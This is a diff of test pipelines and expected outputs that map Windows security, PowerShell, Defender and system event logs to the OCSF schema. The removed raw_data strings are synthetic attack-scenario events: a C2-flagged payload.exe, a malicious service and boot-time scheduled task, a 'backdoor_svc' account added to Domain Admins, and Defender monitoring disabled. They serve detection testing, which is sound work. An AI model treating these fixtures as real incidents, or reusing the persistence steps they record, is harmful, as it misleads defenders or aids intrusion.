a/microsoft/tests/ocsf/eid-4106.tql +++ b/microsoft/tests/ocsf/eid-4106.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4106.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4106.txt b/microsoft/tests/ocsf/eid-4106.txt index 3f4972f..eaf1ed0 100644 --- a/microsoft/tests/ocsf/eid-4106.txt +++ b/microsoft/tests/ocsf/eid-4106.txt @@ -36,8 +36,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 4106\n 1\n 5\n 2\n 0x0\n \n 20106\n \n \n Microsoft-Windows-PowerShell/Operational\n WINHOST01.corp.local\n \n \n {f3a1b2c3-d4e5-6f7a-8b9c-0d1e2f3a4b5c}\n {a1b2c3d4-e5f6-7a8b-9c0d-1e2f3a4b5c6d}\n \n\n", - raw_data_size: 837, script: { type: "PowerShell", type_id: 2, diff --git a/microsoft/tests/ocsf/eid-4624.tql b/microsoft/tests/ocsf/eid-4624.tql index 1f5407a..d89f11a 100644 --- a/microsoft/tests/ocsf/eid-4624.tql +++ b/microsoft/tests/ocsf/eid-4624.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4624.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4624.txt b/microsoft/tests/ocsf/eid-4624.txt index 195b925..622dd88 100644 --- a/microsoft/tests/ocsf/eid-4624.txt +++ b/microsoft/tests/ocsf/eid-4624.txt @@ -45,8 +45,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 4624\n 2\n 0\n 12544\n 0x8020000000000000\n \n 98761\n \n \n Security\n DC01.corp.local\n \n \n S-1-0-0\n -\n -\n 0x0\n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n 3\n Kerberos\n Kerberos\n -\n {B4C8A1F2-3D9E-4A12-8B7C-1F2E3D4A5B6C}\n -\n -\n 0\n 0x0\n -\n 10.0.0.42\n 49827\n %%1833\n -\n -\n -\n %%1843\n 0x0\n %%1842\n \n\n", - raw_data_size: 1918, session: { uid: "{B4C8A1F2-3D9E-4A12-8B7C-1F2E3D4A5B6C}", uid_alt: "0xA1B2C3", diff --git a/microsoft/tests/ocsf/eid-4625.tql b/microsoft/tests/ocsf/eid-4625.tql index 9d08d78..611473d 100644 --- a/microsoft/tests/ocsf/eid-4625.tql +++ b/microsoft/tests/ocsf/eid-4625.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4625.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4625.txt b/microsoft/tests/ocsf/eid-4625.txt index 2116e1c..1311115 100644 --- a/microsoft/tests/ocsf/eid-4625.txt +++ b/microsoft/tests/ocsf/eid-4625.txt @@ -45,8 +45,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 4625\n 0\n 0\n 12546\n 0x8020000000000000\n \n 98762\n \n \n Security\n DC01.corp.local\n \n \n S-1-0-0\n -\n -\n 0x0\n S-1-0-0\n Administrator\n CORP\n 0xC000006D\n %%2313\n 0xC000006A\n 3\n NtLmSsp\n NTLM\n WINHOST01\n -\n -\n 0\n 0x0\n -\n 10.0.0.42\n 49827\n \n\n", - raw_data_size: 1569, severity: "Low", severity_id: 2, src_endpoint: { diff --git a/microsoft/tests/ocsf/eid-4648.tql b/microsoft/tests/ocsf/eid-4648.tql index e9ad6ca..af04fb8 100644 --- a/microsoft/tests/ocsf/eid-4648.tql +++ b/microsoft/tests/ocsf/eid-4648.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4648.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4648.txt b/microsoft/tests/ocsf/eid-4648.txt index 8988d8e..b70f6cd 100644 --- a/microsoft/tests/ocsf/eid-4648.txt +++ b/microsoft/tests/ocsf/eid-4648.txt @@ -56,8 +56,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 4648\n 0\n 0\n 12544\n 0x8020000000000000\n \n 98763\n \n \n Security\n WINHOST01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n {00000000-0000-0000-0000-000000000000}\n svc_backup\n CORP\n {00000000-0000-0000-0000-000000000000}\n fileserver.corp.local\n fileserver.corp.local\n 0xA1B2C3\n C:\\tmp\\payload.exe\n 10.0.0.1\n 445\n \n\n", - raw_data_size: 1421, severity: "Informational", severity_id: 1, src_endpoint: { diff --git a/microsoft/tests/ocsf/eid-4672.tql b/microsoft/tests/ocsf/eid-4672.tql index 19c7581..3c32717 100644 --- a/microsoft/tests/ocsf/eid-4672.tql +++ b/microsoft/tests/ocsf/eid-4672.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4672.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4672.txt b/microsoft/tests/ocsf/eid-4672.txt index 6039c93..601b432 100644 --- a/microsoft/tests/ocsf/eid-4672.txt +++ b/microsoft/tests/ocsf/eid-4672.txt @@ -44,8 +44,6 @@ "SeSystemEnvironmentPrivilege", "SeImpersonatePrivilege", ], - raw_data: "\n \n \n 4672\n 0\n 0\n 12548\n 0x8020000000000000\n \n 98762\n \n \n Security\n DC01.corp.local\n \n \n S-1-5-18\n SYSTEM\n NT AUTHORITY\n 0x3e7\n SeAssignPrimaryTokenPrivilege SeTcbPrivilege SeSecurityPrivilege SeTakeOwnershipPrivilege SeLoadDriverPrivilege SeBackupPrivilege SeRestorePrivilege SeDebugPrivilege SeAuditPrivilege SeSystemEnvironmentPrivilege SeImpersonatePrivilege\n \n\n", - raw_data_size: 1086, session: { uid_alt: "0x3e7", }, diff --git a/microsoft/tests/ocsf/eid-4688.tql b/microsoft/tests/ocsf/eid-4688.tql index 38bc3e2..0ed3bb8 100644 --- a/microsoft/tests/ocsf/eid-4688.tql +++ b/microsoft/tests/ocsf/eid-4688.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4688.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4688.txt b/microsoft/tests/ocsf/eid-4688.txt index b42a098..5c1900e 100644 --- a/microsoft/tests/ocsf/eid-4688.txt +++ b/microsoft/tests/ocsf/eid-4688.txt @@ -66,8 +66,6 @@ path: "C:\\tmp\\payload.exe", pid: 6732, }, - raw_data: "\n \n \n 4688\n 2\n 0\n 13312\n 0x8020000000000000\n \n 98764\n \n \n Security\n WINHOST01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n 0x1a4c\n C:\\tmp\\payload.exe\n %%1937\n 0x1234\n payload.exe --c2 10.0.0.1\n S-1-0-0\n -\n -\n 0x0\n C:\\Windows\\System32\\wscript.exe\n S-1-16-8192\n \n\n", - raw_data_size: 1429, severity: "Informational", severity_id: 1, status: "Success", diff --git a/microsoft/tests/ocsf/eid-4697.tql b/microsoft/tests/ocsf/eid-4697.tql index c110c07..b702364 100644 --- a/microsoft/tests/ocsf/eid-4697.tql +++ b/microsoft/tests/ocsf/eid-4697.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4697.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4697.txt b/microsoft/tests/ocsf/eid-4697.txt index 1fd6edf..6b9fa46 100644 --- a/microsoft/tests/ocsf/eid-4697.txt +++ b/microsoft/tests/ocsf/eid-4697.txt @@ -41,8 +41,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 4697\n 0\n 0\n 12289\n 0x8020000000000000\n \n 98765\n \n \n Security\n WINHOST01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n PayloadSvc\n C:\\tmp\\payload.exe --svc\n 0x10\n 2\n LocalSystem\n \n\n", - raw_data_size: 1124, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-4698.tql b/microsoft/tests/ocsf/eid-4698.tql index 1e4cf62..b29f9eb 100644 --- a/microsoft/tests/ocsf/eid-4698.tql +++ b/microsoft/tests/ocsf/eid-4698.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4698.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4698.txt b/microsoft/tests/ocsf/eid-4698.txt index f6e7a8f..975595f 100644 --- a/microsoft/tests/ocsf/eid-4698.txt +++ b/microsoft/tests/ocsf/eid-4698.txt @@ -47,8 +47,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 4698\n 0\n 0\n 12804\n 0x8020000000000000\n \n 98766\n \n \n Security\n WINHOST01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n \\Microsoft\\Windows\\UpdateOrchestrator\\payload_persist\n <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"><Triggers><BootTrigger><StartBoundary>2024-03-23T12:00:00</StartBoundary><Enabled>true</Enabled></BootTrigger></Triggers><Actions Context="Author"><Exec><Command>C:\\tmp\\payload.exe</Command><Arguments>--c2 10.0.0.1</Arguments></Exec></Actions></Task>\n 720575940379820032\n 0x1a4c\n 0x1234\n 0\n WINHOST01.corp.local\n \n\n", - raw_data_size: 1728, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-4720.tql b/microsoft/tests/ocsf/eid-4720.tql index 236a9d4..6ce7646 100644 --- a/microsoft/tests/ocsf/eid-4720.tql +++ b/microsoft/tests/ocsf/eid-4720.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4720.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4720.txt b/microsoft/tests/ocsf/eid-4720.txt index 45f1280..c2e0b98 100644 --- a/microsoft/tests/ocsf/eid-4720.txt +++ b/microsoft/tests/ocsf/eid-4720.txt @@ -41,8 +41,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 4720\n 0\n 0\n 13824\n 0x8020000000000000\n \n 98767\n \n \n Security\n DC01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n backdoor_svc\n CORP\n S-1-5-21-3107921522-2185401913-891411500-1500\n backdoor_svc\n %%1793\n -\n %%1793\n %%1793\n %%1793\n %%1793\n %%1793\n %%1794\n %%1794\n 513\n -\n 0x0\n 0x15\n %%2080 %%2082 %%2084\n %%1793\n -\n %%1797\n -\n \n\n", - raw_data_size: 1899, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-4722.tql b/microsoft/tests/ocsf/eid-4722.tql index e827a02..97da69e 100644 --- a/microsoft/tests/ocsf/eid-4722.tql +++ b/microsoft/tests/ocsf/eid-4722.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4722.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4722.txt b/microsoft/tests/ocsf/eid-4722.txt index 17190f3..8313d16 100644 --- a/microsoft/tests/ocsf/eid-4722.txt +++ b/microsoft/tests/ocsf/eid-4722.txt @@ -41,8 +41,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 4722\n 0\n 0\n 13824\n 0x8020000000000000\n \n 98770\n \n \n Security\n DC01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n backdoor_svc\n CORP\n S-1-5-21-3107921522-2185401913-891411500-1500\n \n\n", - raw_data_size: 1050, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-4725.tql b/microsoft/tests/ocsf/eid-4725.tql index 11b0dcf..72d581b 100644 --- a/microsoft/tests/ocsf/eid-4725.tql +++ b/microsoft/tests/ocsf/eid-4725.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4725.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4725.txt b/microsoft/tests/ocsf/eid-4725.txt index 7032194..2ec1e11 100644 --- a/microsoft/tests/ocsf/eid-4725.txt +++ b/microsoft/tests/ocsf/eid-4725.txt @@ -41,8 +41,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 4725\n 0\n 0\n 13824\n 0x8020000000000000\n \n 98773\n \n \n Security\n DC01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n backdoor_svc\n CORP\n S-1-5-21-3107921522-2185401913-891411500-1500\n \n\n", - raw_data_size: 1050, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-4726.tql b/microsoft/tests/ocsf/eid-4726.tql index 496a205..ef7f4cc 100644 --- a/microsoft/tests/ocsf/eid-4726.tql +++ b/microsoft/tests/ocsf/eid-4726.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4726.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4726.txt b/microsoft/tests/ocsf/eid-4726.txt index 87ce402..1cdb6a2 100644 --- a/microsoft/tests/ocsf/eid-4726.txt +++ b/microsoft/tests/ocsf/eid-4726.txt @@ -41,8 +41,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 4726\n 0\n 0\n 13824\n 0x8020000000000000\n \n 98774\n \n \n Security\n DC01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n backdoor_svc\n CORP\n S-1-5-21-3107921522-2185401913-891411500-1500\n -\n \n\n", - raw_data_size: 1090, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-4728.tql b/microsoft/tests/ocsf/eid-4728.tql index f0049af..f13f6c9 100644 --- a/microsoft/tests/ocsf/eid-4728.tql +++ b/microsoft/tests/ocsf/eid-4728.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4728.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4728.txt b/microsoft/tests/ocsf/eid-4728.txt index 1678517..5f2665d 100644 --- a/microsoft/tests/ocsf/eid-4728.txt +++ b/microsoft/tests/ocsf/eid-4728.txt @@ -46,8 +46,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 4728\n 0\n 0\n 13826\n 0x8020000000000000\n \n 98776\n \n \n Security\n DC01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n CN=backdoor_svc,CN=Users,DC=corp,DC=local\n S-1-5-21-3107921522-2185401913-891411500-1500\n DomainAdmins\n CORP\n S-1-5-21-3107921522-2185401913-891411500-512\n -\n \n\n", - raw_data_size: 1246, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-4730.tql b/microsoft/tests/ocsf/eid-4730.tql index 39421c2..504daa0 100644 --- a/microsoft/tests/ocsf/eid-4730.tql +++ b/microsoft/tests/ocsf/eid-4730.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4730.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4730.txt b/microsoft/tests/ocsf/eid-4730.txt index c9fdd11..97eb1f7 100644 --- a/microsoft/tests/ocsf/eid-4730.txt +++ b/microsoft/tests/ocsf/eid-4730.txt @@ -46,8 +46,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 4730\n 0\n 0\n 13827\n 0x8020000000000000\n \n 98778\n \n \n Security\n DC01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n OldAdmins\n CORP\n S-1-5-21-3107921522-2185401913-891411500-2000\n -\n \n\n", - raw_data_size: 1087, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-4732.tql b/microsoft/tests/ocsf/eid-4732.tql index cd590d5..6f20bbb 100644 --- a/microsoft/tests/ocsf/eid-4732.tql +++ b/microsoft/tests/ocsf/eid-4732.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4732.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4732.txt b/microsoft/tests/ocsf/eid-4732.txt index d424e03..d7db2d9 100644 --- a/microsoft/tests/ocsf/eid-4732.txt +++ b/microsoft/tests/ocsf/eid-4732.txt @@ -46,8 +46,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 4732\n 0\n 0\n 13826\n 0x8020000000000000\n \n 98768\n \n \n Security\n WINHOST01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n CN=backdoor_svc,CN=Users,DC=corp,DC=local\n S-1-5-21-3107921522-2185401913-891411500-1500\n Administrators\n Builtin\n S-1-5-32-544\n -\n \n\n", - raw_data_size: 1224, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-4769.tql b/microsoft/tests/ocsf/eid-4769.tql index 02008ba..a1e5d6d 100644 --- a/microsoft/tests/ocsf/eid-4769.tql +++ b/microsoft/tests/ocsf/eid-4769.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4769.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4769.txt b/microsoft/tests/ocsf/eid-4769.txt index a7c572c..b8fb350 100644 --- a/microsoft/tests/ocsf/eid-4769.txt +++ b/microsoft/tests/ocsf/eid-4769.txt @@ -34,8 +34,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 4769\n 0\n 0\n 14337\n 0x8020000000000000\n \n 98769\n \n \n Security\n DC01.corp.local\n \n \n jdoe@CORP.LOCAL\n CORP.LOCAL\n cifs/fileserver.corp.local\n S-1-5-21-3107921522-2185401913-891411500-1103\n 0x40810000\n 0x12\n ::ffff:10.0.0.42\n 49827\n 0x0\n {B4C8A1F2-3D9E-4A12-8B7C-1F2E3D4A5B6C}\n -\n \n\n", - raw_data_size: 1239, session: { uid: "{B4C8A1F2-3D9E-4A12-8B7C-1F2E3D4A5B6C}", }, diff --git a/microsoft/tests/ocsf/eid-4771.tql b/microsoft/tests/ocsf/eid-4771.tql index 8f31e5f..f80b305 100644 --- a/microsoft/tests/ocsf/eid-4771.tql +++ b/microsoft/tests/ocsf/eid-4771.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4771.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4771.txt b/microsoft/tests/ocsf/eid-4771.txt index 0869d83..8d74b30 100644 --- a/microsoft/tests/ocsf/eid-4771.txt +++ b/microsoft/tests/ocsf/eid-4771.txt @@ -31,8 +31,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 4771\n 0\n 0\n 14339\n 0x8020000000000000\n \n 98770\n \n \n Security\n DC01.corp.local\n \n \n krbtgt\n S-1-5-21-3107921522-2185401913-891411500-502\n krbtgt/CORP.LOCAL\n 0x40810010\n 0x18\n 2\n ::ffff:10.0.0.42\n 49827\n -\n -\n -\n \n\n", - raw_data_size: 1162, severity: "Low", severity_id: 2, src_endpoint: { diff --git a/microsoft/tests/ocsf/eid-4776.tql b/microsoft/tests/ocsf/eid-4776.tql index 476b404..84842a4 100644 --- a/microsoft/tests/ocsf/eid-4776.tql +++ b/microsoft/tests/ocsf/eid-4776.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4776.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4776.txt b/microsoft/tests/ocsf/eid-4776.txt index 4c7d402..72b7693 100644 --- a/microsoft/tests/ocsf/eid-4776.txt +++ b/microsoft/tests/ocsf/eid-4776.txt @@ -33,8 +33,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 4776\n 0\n 0\n 14336\n 0x8020000000000000\n \n 98771\n \n \n Security\n DC01.corp.local\n \n \n MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\n Administrator\n WINHOST01\n 0xC000006A\n \n\n", - raw_data_size: 862, severity: "Informational", severity_id: 1, src_endpoint: { diff --git a/microsoft/tests/ocsf/eid-5001.tql b/microsoft/tests/ocsf/eid-5001.tql index 73f76b0..40e51f6 100644 --- a/microsoft/tests/ocsf/eid-5001.tql +++ b/microsoft/tests/ocsf/eid-5001.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-5001.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-5001.txt b/microsoft/tests/ocsf/eid-5001.txt index 87cc570..b176845 100644 --- a/microsoft/tests/ocsf/eid-5001.txt +++ b/microsoft/tests/ocsf/eid-5001.txt @@ -38,8 +38,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 5001\n 0\n 3\n 0\n 0x8000000000000000\n \n 45001\n \n \n Microsoft-Windows-Windows Defender/Operational\n WINHOST01.corp.local\n \n \n Windows Defender Antivirus\n 4.18.24010.12\n \n\n", - raw_data_size: 779, severity: "High", severity_id: 4, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-5007.tql b/microsoft/tests/ocsf/eid-5007.tql index 8b5a0bd..2d916dc 100644 --- a/microsoft/tests/ocsf/eid-5007.tql +++ b/microsoft/tests/ocsf/eid-5007.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-5007.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-5007.txt b/microsoft/tests/ocsf/eid-5007.txt index 73a61c3..38eb39f 100644 --- a/microsoft/tests/ocsf/eid-5007.txt +++ b/microsoft/tests/ocsf/eid-5007.txt @@ -38,8 +38,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 5007\n 0\n 4\n 0\n 0x8000000000000000\n \n 45007\n \n \n Microsoft-Windows-Windows Defender/Operational\n WINHOST01.corp.local\n \n \n Windows Defender Antivirus\n 4.18.24010.12\n HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableRealtimeMonitoring = 0x0\n HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableRealtimeMonitoring = 0x1\n \n\n", - raw_data_size: 1035, severity: "High", severity_id: 4, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-6005.tql b/microsoft/tests/ocsf/eid-6005.tql index 35ffa6b..7125358 100644 --- a/microsoft/tests/ocsf/eid-6005.tql +++ b/microsoft/tests/ocsf/eid-6005.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-6005.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-6005.txt b/microsoft/tests/ocsf/eid-6005.txt index a05a29c..a1e0dd4 100644 --- a/microsoft/tests/ocsf/eid-6005.txt +++ b/microsoft/tests/ocsf/eid-6005.txt @@ -31,8 +31,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 6005\n 0\n 4\n 0\n 0x8080000000000000\n \n 1\n \n \n System\n WINHOST01.corp.local\n \n \n The Event log service was started.\n \n\n", - raw_data_size: 591, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-6006.tql b/microsoft/tests/ocsf/eid-6006.tql index 4718edd..ea2511d 100644 --- a/microsoft/tests/ocsf/eid-6006.tql +++ b/microsoft/tests/ocsf/eid-6006.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-6006.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-6006.txt b/microsoft/tests/ocsf/eid-6006.txt index 156920d..da234e2 100644 --- a/microsoft/tests/ocsf/eid-6006.txt +++ b/microsoft/tests/ocsf/eid-6006.txt @@ -31,8 +31,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 6006\n 0\n 4\n 0\n 0x8080000000000000\n \n 2\n \n \n System\n WINHOST01.corp.local\n \n \n The Event log service was stopped.\n \n\n", - raw_data_size: 591, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:58.123456700Z, diff --git a/microsoft/tests/ocsf/eid-7034.tql b/microsoft/tests/ocsf/eid-7034.tql index 25fb053..8423e23 100644 --- a/microsoft/tests/ocsf/eid-7034.tql +++ b/microsoft/tests/ocsf/eid-7034.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-7034.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-7034.txt b/microsoft/tests/ocsf/eid-7034.txt index 34c3442..f65ca69 100644 --- a/microsoft/tests/ocsf/eid-7034.txt +++ b/microsoft/tests/ocsf/eid-7034.txt @@ -31,8 +31,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 7034\n 0\n 2\n 0\n 0x8080000000000000\n \n 44321\n \n \n System\n WINHOST01.corp.local\n \n \n PayloadSvc\n 1\n \n\n", - raw_data_size: 759, severity: "Medium", severity_id: 3, status: "Failure", diff --git a/microsoft/tests/ocsf/eid-7045.tql b/microsoft/tests/ocsf/eid-7045.tql index bd899e9..26e225f 100644 --- a/microsoft/tests/ocsf/eid-7045.tql +++ b/microsoft/tests/ocsf/eid-7045.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-7045.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-7045.txt b/microsoft/tests/ocsf/eid-7045.txt index 1dde7b2..23521d6 100644 --- a/microsoft/tests/ocsf/eid-7045.txt +++ b/microsoft/tests/ocsf/eid-7045.txt @@ -31,8 +31,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 7045\n 0\n 4\n 0\n 0x8080000000000000\n \n 44322\n \n \n System\n WINHOST01.corp.local\n \n \n PayloadSvc\n C:\\tmp\\payload.exe --svc\n Own Process\n Auto Start\n LocalSystem\n \n\n", - raw_data_size: 931, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-9999.tql b/microsoft/tests/ocsf/eid-9999.tql index 0aff212..fe23989 100644 --- a/microsoft/tests/ocsf/eid-9999.tql +++ b/microsoft/tests/ocsf/eid-9999.tql @@ -1,7 +1,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-9999.xml" { read_all } -microsoft::ocsf::map data +this = data.parse_winlog() +microsoft::windows::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-9999.txt b/microsoft/tests/ocsf/eid-9999.txt index 7e4516e..b97390e 100644 --- a/microsoft/tests/ocsf/eid-9999.txt +++ b/microsoft/tests/ocsf/eid-9999.txt @@ -31,8 +31,6 @@ ], version: "1.8.0", }, - raw_data: "\n \n \n 9999\n 0\n 4\n 0\n 0x8000000000000000\n \n 999900\n \n \n Example\n WINHOST01.corp.local\n \n \n Unsupported Windows event\n \n\n", - raw_data_size: 665, severity: "Informational", severity_id: 1, time: 